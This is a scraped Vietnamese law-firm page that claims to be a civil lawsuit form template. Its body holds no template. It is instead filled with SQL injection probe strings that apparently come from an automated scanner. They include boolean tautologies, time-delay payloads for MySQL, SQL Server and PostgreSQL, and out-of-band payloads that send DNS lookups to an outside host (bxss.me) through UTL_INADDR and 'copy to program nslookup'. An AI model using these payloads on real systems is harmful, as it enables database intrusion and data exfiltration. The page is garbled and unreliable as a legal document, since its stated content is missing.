Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu đơn khởi kiện dân sự

Cập nhật lần cuối lúc 15:33 ngày 30/05/2014

1
1
1
1
-1 OR 2+228-228-1=0+0+0+1 --
-1 OR 3+228-228-1=0+0+0+1 --
-1 OR 3*2<(0+5+228-228) --
-1 OR 3*2>(0+5+228-228) --
-1 OR 2+983-983-1=0+0+0+1
-1 OR 3+983-983-1=0+0+0+1
1'"
-1 OR 3*2<(0+5+983-983)
-1 OR 3*2>(0+5+983-983)
-1' OR 2+951-951-1=0+0+0+1 --
-1' OR 3+951-951-1=0+0+0+1 --
-1' OR 3*2<(0+5+951-951) --
-1' OR 3*2>(0+5+951-951) --
-1' OR 2+308-308-1=0+0+0+1 or 'WrwEzxq3'='
\
-1' OR 3+308-308-1=0+0+0+1 or 'WrwEzxq3'='
1
-1' OR 3*2<(0+5+308-308) or 'WrwEzxq3'='
-1' OR 3*2>(0+5+308-308) or 'WrwEzxq3'='
@@dJcR4
-1" OR 2+34-34-1=0+0+0+1 --
JyI=
-1" OR 3+34-34-1=0+0+0+1 --
-1" OR 3*2<(0+5+34-34) --
-1" OR 3*2>(0+5+34-34) --
if(now()=sysdate(),sleep(9.657),0)/*'XOR(if(now()=sysdate(),sleep(9.657),0))OR'"XOR(if(now()=sysdate(),sleep(9.657),0))OR"*/
if(now()=sysdate(),sleep(6.438),0)/*'XOR(if(now()=sysdate(),sleep(6.438),0))OR'"XOR(if(now()=sysdate(),sleep(6.438),0))OR"*/
(select(0)from(select(sleep(3.219)))v)/*'+(select(0)from(select(sleep(3.219)))v)+'"+(select(0)from(select(sleep(3.219)))v)+"*/
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
-1; waitfor delay '0:0:3.219' --
-1; waitfor delay '0:0:9.657' --
-1); waitfor delay '0:0:6.438' --
1 waitfor delay '0:0:6.438' --
1 waitfor delay '0:0:3.219' --
dTz9kVeS'; waitfor delay '0:0:9.657' --
-1;select pg_sleep(9.657); --
-1;select pg_sleep(3.219); --
-1);select pg_sleep(3.219); --
-1));select pg_sleep(6.438); --
MBfxpcOj';select pg_sleep(9.657); --
Di5XhVMf');select pg_sleep(9.657); --
3Iotnx4U'));select pg_sleep(9.657); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5242.34060.68bec.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5244.34060.68bec.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5245.34060.68bec.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5246.34060.68bec.\1.bxss.me
128'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: